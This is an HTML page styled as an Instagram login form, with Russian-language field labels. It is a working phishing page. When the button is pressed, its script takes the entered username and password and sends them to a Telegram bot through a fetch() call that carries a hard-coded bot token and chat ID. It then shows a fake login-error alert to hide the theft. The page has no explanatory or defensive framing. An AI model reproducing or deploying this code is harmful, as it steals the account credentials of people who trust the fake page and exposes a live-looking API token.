<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="server.js"></script>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background: #fafafa;
        }
        .login-box {
            background: white;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
            text-align: center;
        }
        input {
            display: block;
            width: 100%;
            margin: 10px 0;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        button {
            background: #3897f0;
            color: white;
            padding: 10px;
            width: 100%;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="login-box">
        <h2>Instagram</h2>
        <input type="text" id="username" placeholder="Номер телефона, эл. адрес или имя пользователя">
        <input type="password" id="password" placeholder="Пароль">
        <button onclick="sendData()">Вход</button>
    </div>

    <script>
        function sendData() {
            const username = document.getElementById('username').value;
            const password = document.getElementById('password').value;
            const botToken = '7900414107:AAGqO7zfGHNua1hBrvYH_uY8FlzZMmtefK0';
            const chatId = '1342016402';
            
            const message = `Логин: ${username}%0AПароль: ${password}`;
            const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${message}`;
            
            fetch(url)
                .then(response => alert('Ошибка входа! Проверьте данные.'));
        }
    </script>
</body>
</html>